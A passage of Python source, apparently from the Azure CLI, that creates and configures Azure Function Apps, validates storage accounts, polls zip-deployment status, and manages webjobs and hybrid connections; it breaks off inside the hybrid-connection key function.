    """Return True if plan_info is an AppServicePlan on the ElasticPremium tier."""
    SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
    if isinstance(plan_info, AppServicePlan):
        if isinstance(plan_info.sku, SkuDescription):
            # NOTE: exact-case comparison here, unlike is_plan_consumption's .lower()
            return plan_info.sku.tier == 'ElasticPremium'
    return False


def validate_and_convert_to_int(flag, val):
    """Convert val to int, raising a CLIError that names the offending flag on failure."""
    try:
        return int(val)
    except ValueError:
        raise CLIError("Usage error: {} is expected to have an int value.".format(flag))


def validate_range_of_int_flag(flag_name, value, min_val, max_val):
    """Convert value to int and require min_val <= value <= max_val; return the int."""
    value = validate_and_convert_to_int(flag_name, value)
    if min_val > value or value > max_val:
        raise CLIError("Usage error: {} is expected to be between {} and {} (inclusive)".format(flag_name,
                                                                                                min_val,
                                                                                                max_val))
    return value


def create_functionapp(cmd, resource_group_name, name, storage_account, plan=None,
                       os_type=None, functions_version=None, runtime=None, runtime_version=None,
                       consumption_plan_location=None, app_insights=None, app_insights_key=None,
                       disable_app_insights=None, deployment_source_url=None,
                       deployment_source_branch='master', deployment_local_git=None,
                       docker_registry_server_password=None, docker_registry_server_user=None,
                       deployment_container_image_name=None, tags=None, assign_identities=None,
                       role='Contributor', scope=None, vnet=None, subnet=None):
    """Create an Azure Function App (`az functionapp create`).

    Exactly one of --plan / --consumption-plan-location must be given. Validates the runtime /
    runtime-version / functions-version combination against the bundled stacks JSON, builds the
    Site definition (app settings, kind, linux_fx_version, optional VNet integration), creates
    the app, then optionally wires up source control, Application Insights, container settings,
    and managed identities. Returns the created Site.
    """
    # pylint: disable=too-many-statements, too-many-branches
    if functions_version is None:
        logger.warning("No functions version specified so defaulting to 3. In the future, specifying a version will "
                       "be required. To create a 3.x function you would pass in the flag `--functions-version 3`")
        functions_version = '3'
    if deployment_source_url and deployment_local_git:
        raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git')
    if bool(plan) == bool(consumption_plan_location):
        raise CLIError("usage error: --plan NAME_OR_ID | --consumption-plan-location LOCATION")
    from azure.mgmt.web.models import Site
    SiteConfig, NameValuePair = cmd.get_models('SiteConfig', 'NameValuePair')
    docker_registry_server_url = parse_docker_image_name(deployment_container_image_name)
    # three-state CLI flag arrives as a string; only the literal "true" disables app insights
    disable_app_insights = (disable_app_insights == "true")
    site_config = SiteConfig(app_settings=[])
    client = web_client_factory(cmd.cli_ctx)
    if vnet or subnet:
        if plan:
            if is_valid_resource_id(plan):
                parse_result = parse_resource_id(plan)
                plan_info = client.app_service_plans.get(parse_result['resource_group'],
                                                         parse_result['name'])
            else:
                plan_info = client.app_service_plans.get(resource_group_name, plan)
            webapp_location = plan_info.location
        else:
            webapp_location = consumption_plan_location
        subnet_info = _get_subnet_info(cmd=cmd,
                                       resource_group_name=resource_group_name,
                                       subnet=subnet,
                                       vnet=vnet)
        # VNet integration requires the app and the VNet to be co-located
        _validate_vnet_integration_location(cmd=cmd, webapp_location=webapp_location,
                                            subnet_resource_group=subnet_info["resource_group_name"],
                                            vnet_name=subnet_info["vnet_name"])
        _vnet_delegation_check(cmd, subnet_subscription_id=subnet_info["subnet_subscription_id"],
                               vnet_resource_group=subnet_info["resource_group_name"],
                               vnet_name=subnet_info["vnet_name"],
                               subnet_name=subnet_info["subnet_name"])
        site_config.vnet_route_all_enabled = True
        subnet_resource_id = subnet_info["subnet_resource_id"]
    else:
        subnet_resource_id = None
    functionapp_def = Site(location=None, site_config=site_config, tags=tags,
                           virtual_network_subnet_id=subnet_resource_id)
    KEYS = FUNCTIONS_STACKS_API_KEYS()
    plan_info = None
    if runtime is not None:
        runtime = runtime.lower()
    if consumption_plan_location:
        locations = list_consumption_locations(cmd)
        location = next((loc for loc in locations
                         if loc['name'].lower() == consumption_plan_location.lower()), None)
        if location is None:
            raise CLIError("Location is invalid. Use: az functionapp list-consumption-locations")
        functionapp_def.location = consumption_plan_location
        functionapp_def.kind = 'functionapp'
        # if os_type is None, the os type is windows
        is_linux = os_type and os_type.lower() == 'linux'
    else:  # apps with SKU based plan
        if is_valid_resource_id(plan):
            parse_result = parse_resource_id(plan)
            plan_info = client.app_service_plans.get(parse_result['resource_group'],
                                                     parse_result['name'])
        else:
            plan_info = client.app_service_plans.get(resource_group_name, plan)
        if not plan_info:
            raise CLIError("The plan '{}' doesn't exist".format(plan))
        location = plan_info.location
        # a 'reserved' plan is a Linux plan
        is_linux = plan_info.reserved
        functionapp_def.server_farm_id = plan
        functionapp_def.location = location
    if functions_version == '2' and functionapp_def.location in FUNCTIONS_NO_V2_REGIONS:
        raise CLIError("2.x functions are not supported in this region. To create a 3.x function, "
                       "pass in the flag '--functions-version 3'")
    if is_linux and not runtime and (consumption_plan_location or not deployment_container_image_name):
        raise CLIError(
            "usage error: --runtime RUNTIME required for linux functions apps without custom image.")
    runtime_stacks_json = _load_runtime_stacks_json_functionapp(is_linux)
    if runtime is None and runtime_version is not None:
        raise CLIError('Must specify --runtime to use --runtime-version')
    # get the matching runtime stack object
    runtime_json = _get_matching_runtime_json_functionapp(runtime_stacks_json,
                                                          runtime if runtime else 'dotnet')
    if not runtime_json:
        # no matching runtime for os
        os_string = "linux" if is_linux else "windows"
        supported_runtimes = list(map(lambda x: x[KEYS.NAME], runtime_stacks_json))
        raise CLIError("usage error: Currently supported runtimes (--runtime) in {} function apps are: {}."
                       .format(os_string, ', '.join(supported_runtimes)))
    runtime_version_json = _get_matching_runtime_version_json_functionapp(runtime_json,
                                                                          functions_version,
                                                                          runtime_version,
                                                                          is_linux)
    if not runtime_version_json:
        supported_runtime_versions = list(map(
            lambda x: x[KEYS.DISPLAY_VERSION],
            _get_supported_runtime_versions_functionapp(runtime_json, functions_version)))
        if runtime_version:
            if runtime == 'dotnet':
                raise CLIError('--runtime-version is not supported for --runtime dotnet. Dotnet version is determined '
                               'by --functions-version. Dotnet version {} is not supported by Functions version {}.'
                               .format(runtime_version, functions_version))
            raise CLIError('--runtime-version {} is not supported for the selected --runtime {} and '
                           '--functions-version {}. Supported versions are: {}.'
                           .format(runtime_version, runtime, functions_version,
                                   ', '.join(supported_runtime_versions)))
        # if runtime_version was not specified, then that runtime is not supported for that functions version
        raise CLIError('no supported --runtime-version found for the selected --runtime {} and '
                       '--functions-version {}'
                       .format(runtime, functions_version))
    if runtime == 'dotnet':
        logger.warning('--runtime-version is not supported for --runtime dotnet. Dotnet version is determined by '
                       '--functions-version. Dotnet version will be %s for this function app.',
                       runtime_version_json[KEYS.DISPLAY_VERSION])
    if runtime_version_json[KEYS.IS_DEPRECATED]:
        logger.warning('%s version %s has been deprecated. In the future, this version will be unavailable. '
                       'Please update your command to use a more recent version. For a list of supported '
                       '--runtime-versions, run \"az functionapp create -h\"',
                       runtime_json[KEYS.PROPERTIES][KEYS.DISPLAY],
                       runtime_version_json[KEYS.DISPLAY_VERSION])
    site_config_json = runtime_version_json[KEYS.SITE_CONFIG_DICT]
    app_settings_json = runtime_version_json[KEYS.APP_SETTINGS_DICT]
    con_string = _validate_and_get_connection_string(cmd.cli_ctx, resource_group_name, storage_account)
    if is_linux:
        functionapp_def.kind = 'functionapp,linux'
        functionapp_def.reserved = True
        is_consumption = consumption_plan_location is not None
        if not is_consumption:
            site_config.app_settings.append(NameValuePair(name='MACHINEKEY_DecryptionKey',
                                                          value=str(hexlify(urandom(32)).decode()).upper()))
            if deployment_container_image_name:
                functionapp_def.kind = 'functionapp,linux,container'
                site_config.app_settings.append(NameValuePair(name='DOCKER_CUSTOM_IMAGE_NAME',
                                                              value=deployment_container_image_name))
                site_config.app_settings.append(NameValuePair(name='FUNCTION_APP_EDIT_MODE',
                                                              value='readOnly'))
                site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
                                                              value='false'))
                site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
                # clear all runtime specific configs and settings
                site_config_json = {KEYS.USE_32_BIT_WORKER_PROC: False}
                app_settings_json = {}
                # ensure that app insights is created if not disabled
                runtime_version_json[KEYS.APPLICATION_INSIGHTS] = True
            else:
                site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
                                                              value='true'))
    else:
        functionapp_def.kind = 'functionapp'
    # set site configs
    for prop, value in site_config_json.items():
        snake_case_prop = _convert_camel_to_snake_case(prop)
        setattr(site_config, snake_case_prop, value)
    # temporary workaround for dotnet-isolated linux consumption apps
    if is_linux and consumption_plan_location is not None and runtime == 'dotnet-isolated':
        site_config.linux_fx_version = ''
    # adding app settings
    for app_setting, value in app_settings_json.items():
        site_config.app_settings.append(NameValuePair(name=app_setting, value=value))
    site_config.app_settings.append(NameValuePair(name='FUNCTIONS_EXTENSION_VERSION',
                                                  value=_get_extension_version_functionapp(functions_version)))
    site_config.app_settings.append(NameValuePair(name='AzureWebJobsStorage', value=con_string))
    # If plan is not consumption or elastic premium, we need to set always on
    if consumption_plan_location is None and not is_plan_elastic_premium(cmd, plan_info):
        site_config.always_on = True
    # If plan is elastic premium or consumption, we need these app settings
    if is_plan_elastic_premium(cmd, plan_info) or consumption_plan_location is not None:
        site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTAZUREFILECONNECTIONSTRING',
                                                      value=con_string))
        site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTSHARE',
                                                      value=_get_content_share_name(name)))
    create_app_insights = False
    if app_insights_key is not None:
        site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY',
                                                      value=app_insights_key))
    elif app_insights is not None:
        instrumentation_key = get_app_insights_key(cmd.cli_ctx, resource_group_name, app_insights)
        site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY',
                                                      value=instrumentation_key))
    elif disable_app_insights or not runtime_version_json[KEYS.APPLICATION_INSIGHTS]:
        # set up dashboard if no app insights
        site_config.app_settings.append(NameValuePair(name='AzureWebJobsDashboard', value=con_string))
    elif not disable_app_insights and runtime_version_json[KEYS.APPLICATION_INSIGHTS]:
        create_app_insights = True
    poller = client.web_apps.begin_create_or_update(resource_group_name, name, functionapp_def)
    functionapp = LongRunningOperation(cmd.cli_ctx)(poller)
    if consumption_plan_location and is_linux:
        logger.warning("Your Linux function app '%s', that uses a consumption plan has been successfully "
                       "created but is not active until content is published using "
                       "Azure Portal or the Functions Core Tools.", name)
    else:
        _set_remote_or_local_git(cmd, functionapp, resource_group_name, name, deployment_source_url,
                                 deployment_source_branch, deployment_local_git)
    if create_app_insights:
        try:
            try_create_application_insights(cmd, functionapp)
        except Exception:  # pylint: disable=broad-except
            # best-effort: fall back to the storage-backed dashboard if AI creation fails
            logger.warning('Error while trying to create and configure an Application Insights for the Function App. '
                           'Please use the Azure Portal to create and configure the Application Insights, if needed.')
            update_app_settings(cmd, functionapp.resource_group, functionapp.name,
                                ['AzureWebJobsDashboard={}'.format(con_string)])
    if deployment_container_image_name:
        update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url,
                                              deployment_container_image_name, docker_registry_server_user,
                                              docker_registry_server_password)
    if assign_identities is not None:
        identity = assign_identity(cmd, resource_group_name, name, assign_identities, role, None, scope)
        functionapp.identity = identity
    return functionapp


def _load_runtime_stacks_json_functionapp(is_linux):
    """Load the bundled function-app runtime stacks JSON for the requested OS."""
    KEYS = FUNCTIONS_STACKS_API_KEYS()
    if is_linux:
        return get_file_json(FUNCTIONS_STACKS_API_JSON_PATHS['linux'])[KEYS.VALUE]
    return get_file_json(FUNCTIONS_STACKS_API_JSON_PATHS['windows'])[KEYS.VALUE]


def _get_matching_runtime_json_functionapp(stacks_json, runtime):
    """Return the stack entry whose name equals runtime, or None."""
    KEYS = FUNCTIONS_STACKS_API_KEYS()
    matching_runtime_json = list(filter(lambda x: x[KEYS.NAME] == runtime, stacks_json))
    if matching_runtime_json:
        return matching_runtime_json[0]
    return None


def _get_supported_runtime_versions_functionapp(runtime_json, functions_version):
    """Return the major-version entries of runtime_json that support the given Functions version."""
    KEYS = FUNCTIONS_STACKS_API_KEYS()
    extension_version = _get_extension_version_functionapp(functions_version)
    supported_versions_list = []
    for runtime_version_json in runtime_json[KEYS.PROPERTIES][KEYS.MAJOR_VERSIONS]:
        if extension_version in runtime_version_json[KEYS.SUPPORTED_EXTENSION_VERSIONS]:
            supported_versions_list.append(runtime_version_json)
    return supported_versions_list
def _get_matching_runtime_version_json_functionapp(runtime_json, functions_version, runtime_version, is_linux):
    """Return the stack entry for an explicit runtime_version, or the default for functions_version.

    With an explicit runtime_version: returns the matching major-version entry (or None if that
    version doesn't support the requested Functions extension version). Without one: returns the
    highest entry flagged IS_DEFAULT among the supported versions ({} if none).
    """
    KEYS = FUNCTIONS_STACKS_API_KEYS()
    extension_version = _get_extension_version_functionapp(functions_version)
    if runtime_version:
        for runtime_version_json in runtime_json[KEYS.PROPERTIES][KEYS.MAJOR_VERSIONS]:
            if (runtime_version_json[KEYS.DISPLAY_VERSION] == runtime_version and
                    extension_version in runtime_version_json[KEYS.SUPPORTED_EXTENSION_VERSIONS]):
                return runtime_version_json
        return None
    # find the matching default runtime version
    supported_versions_list = _get_supported_runtime_versions_functionapp(runtime_json, functions_version)
    default_version_json = {}
    default_version = 0.0
    for current_runtime_version_json in supported_versions_list:
        if current_runtime_version_json[KEYS.IS_DEFAULT]:
            current_version = _get_runtime_version_functionapp(
                current_runtime_version_json[KEYS.RUNTIME_VERSION], is_linux)
            if not default_version_json or default_version < current_version:
                default_version_json = current_runtime_version_json
                default_version = current_version
    return default_version_json


def _get_extension_version_functionapp(functions_version):
    """Map a Functions version ('3') to its extension-bundle form ('~3'); default '~2'."""
    if functions_version is not None:
        return '~{}'.format(functions_version)
    return '~2'


def _get_app_setting_set_functionapp(site_config, app_setting):
    """Return all NameValuePair entries in site_config whose name equals app_setting."""
    return list(filter(lambda x: x.name == app_setting, site_config.app_settings))


def _convert_camel_to_snake_case(text):
    """Convert camelCase to snake_case (inserts '_' before each uppercase letter, then lowers)."""
    return reduce(lambda x, y: x + ('_' if y.isupper() else '') + y, text).lower()


def _get_runtime_version_functionapp(version_string, is_linux):
    """Parse a runtime version string into a comparable float (0 if unparseable).

    Tries the Windows regex, then the Linux regex, then a plain float() conversion.
    """
    import re
    windows_match = re.fullmatch(FUNCTIONS_WINDOWS_RUNTIME_VERSION_REGEX, version_string)
    if windows_match:
        return float(windows_match.group(1))
    linux_match = re.fullmatch(FUNCTIONS_LINUX_RUNTIME_VERSION_REGEX, version_string)
    if linux_match:
        return float(linux_match.group(1))
    try:
        return float(version_string)
    except ValueError:
        return 0


def _get_content_share_name(app_name):
    """Derive a unique WEBSITE_CONTENTSHARE value from the app name."""
    # content share name should be up to 63 characters long, lowercase letter and digits, and random
    # so take the first 50 characters of the app name and add the last 12 digits of a random uuid
    share_name = app_name[0:50]
    suffix = str(uuid.uuid4()).split('-')[-1]
    return share_name.lower() + suffix


def try_create_application_insights(cmd, functionapp):
    """Best-effort creation of an Application Insights component named after the function app.

    On success, sets APPINSIGHTS_INSTRUMENTATIONKEY on the app; on failure, only warns.
    """
    creation_failed_warn = 'Unable to create the Application Insights for the Function App. ' \
                           'Please use the Azure Portal to manually create and configure the Application Insights, ' \
                           'if needed.'
    ai_resource_group_name = functionapp.resource_group
    ai_name = functionapp.name
    ai_location = functionapp.location
    app_insights_client = get_mgmt_service_client(cmd.cli_ctx, ApplicationInsightsManagementClient)
    ai_properties = {
        "name": ai_name,
        "location": ai_location,
        "kind": "web",
        "properties": {
            "Application_Type": "web"
        }
    }
    appinsights = app_insights_client.components.create_or_update(ai_resource_group_name, ai_name,
                                                                  ai_properties)
    if appinsights is None or appinsights.instrumentation_key is None:
        logger.warning(creation_failed_warn)
        return
    # We make this success message as a warning to no interfere with regular JSON output in stdout
    logger.warning('Application Insights \"%s\" was created for this Function App. '
                   'You can visit https://portal.azure.com/#resource%s/overview to view your '
                   'Application Insights component', appinsights.name, appinsights.id)
    update_app_settings(cmd, functionapp.resource_group, functionapp.name,
                        ['APPINSIGHTS_INSTRUMENTATIONKEY={}'.format(appinsights.instrumentation_key)])
def _set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url=None,
                             deployment_source_branch='master', deployment_local_git=None):
    """Configure either a remote git source (manual integration) or local git deployment.

    Remote-git failures are downgraded to warnings; local git attaches the repo url to the
    returned webapp object as 'deploymentLocalGitUrl'.
    """
    if deployment_source_url:
        logger.warning("Linking to git repository '%s'", deployment_source_url)
        try:
            config_source_control(cmd, resource_group_name, name, deployment_source_url, 'git',
                                  deployment_source_branch, manual_integration=True)
        except Exception as ex:  # pylint: disable=broad-except
            ex = ex_handler_factory(no_throw=True)(ex)
            logger.warning("Link to git repository failed due to error '%s'", ex)
    if deployment_local_git:
        local_git_info = enable_local_git(cmd, resource_group_name, name)
        logger.warning("Local git is configured with url of '%s'", local_git_info['url'])
        setattr(webapp, 'deploymentLocalGitUrl', local_git_info['url'])


def _validate_and_get_connection_string(cli_ctx, resource_group_name, storage_account):
    """Validate a storage account (endpoints + SKU) and return its connection string.

    storage_account may be a plain name (assumed in resource_group_name) or a full resource id.
    Requires blob, queue and table endpoints and an allowed replication SKU.
    """
    sa_resource_group = resource_group_name
    if is_valid_resource_id(storage_account):
        sa_resource_group = parse_resource_id(storage_account)['resource_group']
        storage_account = parse_resource_id(storage_account)['name']
    storage_client = get_mgmt_service_client(cli_ctx, StorageManagementClient)
    storage_properties = storage_client.storage_accounts.get_properties(sa_resource_group,
                                                                        storage_account)
    error_message = ''
    endpoints = storage_properties.primary_endpoints
    sku = storage_properties.sku.name
    allowed_storage_types = ['Standard_GRS', 'Standard_RAGRS', 'Standard_LRS', 'Standard_ZRS', 'Premium_LRS', 'Standard_GZRS']  # pylint: disable=line-too-long
    for e in ['blob', 'queue', 'table']:
        if not getattr(endpoints, e, None):
            error_message = "Storage account '{}' has no '{}' endpoint. It must have table, queue, and blob endpoints all enabled".format(storage_account, e)  # pylint: disable=line-too-long
    if sku not in allowed_storage_types:
        error_message += 'Storage type {} is not allowed'.format(sku)
    if error_message:
        raise CLIError(error_message)
    obj = storage_client.storage_accounts.list_keys(sa_resource_group, storage_account)  # pylint: disable=no-member
    try:
        keys = [obj.keys[0].value, obj.keys[1].value]  # pylint: disable=no-member
    except AttributeError:
        # Older API versions have a slightly different structure
        keys = [obj.key1, obj.key2]  # pylint: disable=no-member
    endpoint_suffix = cli_ctx.cloud.suffixes.storage_endpoint
    connection_string = 'DefaultEndpointsProtocol={};EndpointSuffix={};AccountName={};AccountKey={}'.format(
        "https", endpoint_suffix, storage_account, keys[0])  # pylint: disable=no-member
    return connection_string


def list_consumption_locations(cmd):
    """Return the regions that support Dynamic (Consumption) plans, as lowercase no-space names."""
    client = web_client_factory(cmd.cli_ctx)
    regions = client.list_geo_regions(sku='Dynamic')
    return [{'name': x.name.lower().replace(' ', '')} for x in regions]


def list_locations(cmd, sku, linux_workers_enabled=None):
    """Return geo regions for a SKU, intersected with the provider's 'sites' resource locations."""
    web_client = web_client_factory(cmd.cli_ctx)
    full_sku = get_sku_name(sku)
    web_client_geo_regions = web_client.list_geo_regions(sku=full_sku,
                                                         linux_workers_enabled=linux_workers_enabled)
    providers_client = providers_client_factory(cmd.cli_ctx)
    providers_client_locations_list = getattr(providers_client.get('Microsoft.Web'),
                                              'resource_types', [])
    for resource_type in providers_client_locations_list:
        if resource_type.resource_type == 'sites':
            providers_client_locations_list = resource_type.locations
            break
    return [geo_region for geo_region in web_client_geo_regions
            if geo_region.name in providers_client_locations_list]


def _check_zip_deployment_status(cmd, rg_name, name, deployment_status_url, authorization, timeout=None):
    """Poll the Kudu deployment status endpoint until success (4), failure (3) or timeout.

    Polls every 2 seconds; timeout (seconds) caps the number of polls, defaulting to 450 polls
    (~15 minutes). Raises CLIError on failure or timeout; returns the final status dict.
    """
    import requests
    from azure.cli.core.util import should_disable_connection_verify
    total_trials = (int(timeout) // 2) if timeout else 450
    num_trials = 0
    while num_trials < total_trials:
        time.sleep(2)
        response = requests.get(deployment_status_url, headers=authorization,
                                verify=not should_disable_connection_verify())
        try:
            res_dict = response.json()
        except json.decoder.JSONDecodeError:
            logger.warning("Deployment status endpoint %s returns malformed data. Retrying...",
                           deployment_status_url)
            res_dict = {}
        finally:
            num_trials = num_trials + 1
        # status 3 == failed, 4 == succeeded (Kudu deployment status codes)
        if res_dict.get('status', 0) == 3:
            _configure_default_logging(cmd, rg_name, name)
            raise CLIError("Zip deployment failed. {}. Please run the command az webapp log deployment show "
                           "-n {} -g {}".format(res_dict, name, rg_name))
        if res_dict.get('status', 0) == 4:
            break
        if 'progress' in res_dict:
            logger.info(res_dict['progress'])  # show only in debug mode, customers seem to find this confusing
    # if the deployment is taking longer than expected
    if res_dict.get('status', 0) != 4:
        _configure_default_logging(cmd, rg_name, name)
        raise CLIError("""Timeout reached by the command, however, the deployment operation is still on-going. Navigate to your scm site to check the deployment status""")
    return res_dict
def list_continuous_webjobs(cmd, resource_group_name, name, slot=None):
    """List continuous webjobs for the app (or the given slot)."""
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                   'list_continuous_web_jobs', slot)


def start_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
    """Start a continuous webjob and return its refreshed state."""
    client = web_client_factory(cmd.cli_ctx)
    if slot:
        client.web_apps.start_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
        return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
    client.web_apps.start_continuous_web_job(resource_group_name, name, webjob_name)
    return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)


def stop_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
    """Stop a continuous webjob and return its refreshed state."""
    client = web_client_factory(cmd.cli_ctx)
    if slot:
        client.web_apps.stop_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
        return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
    client.web_apps.stop_continuous_web_job(resource_group_name, name, webjob_name)
    return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)


def remove_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
    """Delete a continuous webjob."""
    client = web_client_factory(cmd.cli_ctx)
    if slot:
        return client.web_apps.delete_continuous_web_job_slot(resource_group_name, name,
                                                              webjob_name, slot)
    return client.web_apps.delete_continuous_web_job(resource_group_name, name, webjob_name)


def list_triggered_webjobs(cmd, resource_group_name, name, slot=None):
    """List triggered webjobs for the app (or the given slot)."""
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                   'list_triggered_web_jobs', slot)


def run_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
    """Run a triggered webjob once and return its refreshed state."""
    client = web_client_factory(cmd.cli_ctx)
    if slot:
        client.web_apps.run_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
        return client.web_apps.get_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
    client.web_apps.run_triggered_web_job(resource_group_name, name, webjob_name)
    return client.web_apps.get_triggered_web_job(resource_group_name, name, webjob_name)


def remove_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
    """Delete a triggered webjob."""
    client = web_client_factory(cmd.cli_ctx)
    if slot:
        return client.web_apps.delete_triggered_web_job_slot(resource_group_name, name,
                                                             webjob_name, slot)
    return client.web_apps.delete_triggered_web_job(resource_group_name, name, webjob_name)


def list_hc(cmd, name, resource_group_name, slot=None):
    """List the app's hybrid connections, reformatted to a pruned dict shape."""
    client = web_client_factory(cmd.cli_ctx)
    if slot is None:
        listed_vals = client.web_apps.list_hybrid_connections(resource_group_name, name)
    else:
        listed_vals = client.web_apps.list_hybrid_connections_slot(resource_group_name, name, slot)
    # reformats hybrid connection, to prune unnecessary fields
    mod_list = []
    for x in listed_vals.additional_properties["value"]:
        properties = x["properties"]
        # resource id segment 4 is the resource group name
        resourceGroup = x["id"].split("/")
        mod_hc = {
            "id": x["id"],
            "location": x["location"],
            "name": x["name"],
            "properties": {
                "hostname": properties["hostname"],
                "port": properties["port"],
                "relayArmUri": properties["relayArmUri"],
                "relayName": properties["relayName"],
                "serviceBusNamespace": properties["serviceBusNamespace"],
                "serviceBusSuffix": properties["serviceBusSuffix"]
            },
            "resourceGroup": resourceGroup[4],
            "type": x["type"]
        }
        mod_list.append(mod_hc)
    return mod_list


def add_hc(cmd, name, resource_group_name, namespace, hybrid_connection, slot=None):
    """Attach a Service Bus Relay hybrid connection to a webapp (or slot).

    Looks up the relay namespace, ensures a 'defaultSender' send-authorization rule exists,
    reads the endpoint host:port from the connection's user metadata, then creates/updates the
    hybrid connection on the app. Returns a pruned dict describing the resulting connection.
    """
    HybridConnection = cmd.get_models('HybridConnection')
    web_client = web_client_factory(cmd.cli_ctx)
    hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
    namespace_client = namespaces_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
    hy_co_id = ''
    for n in namespace_client.list():
        logger.warning(n.name)
        if n.name == namespace:
            hy_co_id = n.id
    if hy_co_id == '':
        raise ResourceNotFoundError('Azure Service Bus Relay namespace {} was not found.'.format(namespace))
    # walk the namespace resource id to find its resource group segment
    i = 0
    hy_co_resource_group = ''
    hy_co_split = hy_co_id.split("/")
    for z in hy_co_split:
        if z == "resourceGroups":
            hy_co_resource_group = hy_co_split[i + 1]
        i = i + 1
    # calling the relay API to get information about the hybrid connection
    hy_co = hy_co_client.get(hy_co_resource_group, namespace, hybrid_connection)
    # if the hybrid connection does not have a default sender authorization
    # rule, create it
    hy_co_rules = hy_co_client.list_authorization_rules(hy_co_resource_group, namespace,
                                                        hybrid_connection)
    has_default_sender_key = False
    for r in hy_co_rules:
        if r.name.lower() == "defaultsender":
            for z in r.rights:
                if z == z.send:
                    has_default_sender_key = True
    if not has_default_sender_key:
        rights = [AccessRights.send]
        hy_co_client.create_or_update_authorization_rule(hy_co_resource_group, namespace,
                                                         hybrid_connection, "defaultSender", rights)
    hy_co_keys = hy_co_client.list_keys(hy_co_resource_group, namespace, hybrid_connection,
                                        "defaultSender")
    hy_co_info = hy_co.id
    # user_metadata is a stringified list of {"key": ..., "value": ...} dicts
    hy_co_metadata = ast.literal_eval(hy_co.user_metadata)
    hy_co_hostname = ''
    for x in hy_co_metadata:
        if x["key"] == "endpoint":
            hy_co_hostname = x["value"]
    hostname_parts = hy_co_hostname.split(":")
    hostname = hostname_parts[0]
    port = hostname_parts[1]  # NOTE(review): kept as a string here — confirm the API accepts that
    id_parameters = hy_co_info.split("/")
    # populate object with information from the hybrid connection, and set it
    # on webapp
    hc = HybridConnection(service_bus_namespace=id_parameters[8],
                          relay_name=hybrid_connection,
                          relay_arm_uri=hy_co_info,
                          hostname=hostname,
                          port=port,
                          send_key_name="defaultSender",
                          send_key_value=hy_co_keys.primary_key,
                          service_bus_suffix=".servicebus.windows.net")
    if slot is None:
        return_hc = web_client.web_apps.create_or_update_hybrid_connection(resource_group_name, name,
                                                                           namespace,
                                                                           hybrid_connection, hc)
    else:
        return_hc = web_client.web_apps.create_or_update_hybrid_connection_slot(resource_group_name,
                                                                                name, namespace,
                                                                                hybrid_connection,
                                                                                slot, hc)
    # reformats hybrid connection, to prune unnecessary fields
    resourceGroup = return_hc.id.split("/")
    mod_hc = {
        "hostname": return_hc.hostname,
        "id": return_hc.id,
        "location": return_hc.additional_properties["location"],
        "name": return_hc.name,
        "port": return_hc.port,
        "relayArmUri": return_hc.relay_arm_uri,
        "resourceGroup": resourceGroup[4],
        "serviceBusNamespace": return_hc.service_bus_namespace,
        "serviceBusSuffix": return_hc.service_bus_suffix
    }
    return mod_hc
# set the key the apps use to connect with the hybrid connection
def set_hc_key(cmd, plan, resource_group_name, namespace, hybrid_connection, key_type):
    """Rotate the send key ('primary' or 'secondary') on every app using a hybrid connection.

    Resolves the relay resource group from the plan's hybrid-connection ARM uri, ensures a
    'defaultSender' authorization rule exists, then updates each app on the plan that uses the
    connection. Returns the refreshed list of apps (or None on an invalid key_type).
    """
    HybridConnection = cmd.get_models('HybridConnection')
    web_client = web_client_factory(cmd.cli_ctx)
    # extract the hybrid connection resource group
    asp_hy_co = web_client.app_service_plans.get_hybrid_connection(resource_group_name, plan,
                                                                   namespace, hybrid_connection)
    arm_uri = asp_hy_co.relay_arm_uri
    split_uri = arm_uri.split("resourceGroups/")
    resource_group_strings = split_uri[1].split('/')
    relay_resource_group = resource_group_strings[0]
    hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
    # calling the relay function to obtain information about the hc in question
    hy_co = hy_co_client.get(relay_resource_group, namespace, hybrid_connection)
    # if the hybrid connection does not have a default sender authorization
    # rule, create it
    hy_co_rules = hy_co_client.list_authorization_rules(relay_resource_group, namespace,
                                                        hybrid_connection)
    has_default_sender_key = False
    for r in hy_co_rules:
        if r.name.lower() == "defaultsender":
            for z in r.rights:
                if z == z.send:
                    has_default_sender_key = True
    if not has_default_sender_key:
        rights = [AccessRights.send]
        hy_co_client.create_or_update_authorization_rule(relay_resource_group, namespace,
                                                         hybrid_connection, "defaultSender", rights)
    hy_co_keys = hy_co_client.list_keys(relay_resource_group, namespace, hybrid_connection,
                                        "defaultSender")
    hy_co_metadata = ast.literal_eval(hy_co.user_metadata)
    hy_co_hostname = 0
    for x in hy_co_metadata:
        if x["key"] == "endpoint":
            hy_co_hostname = x["value"]
    hostname_parts = hy_co_hostname.split(":")
    hostname = hostname_parts[0]
    port = hostname_parts[1]
    key = "empty"
    if key_type.lower() == "primary":
        key = hy_co_keys.primary_key
    elif key_type.lower() == "secondary":
        key = hy_co_keys.secondary_key
    # ensures the input is correct
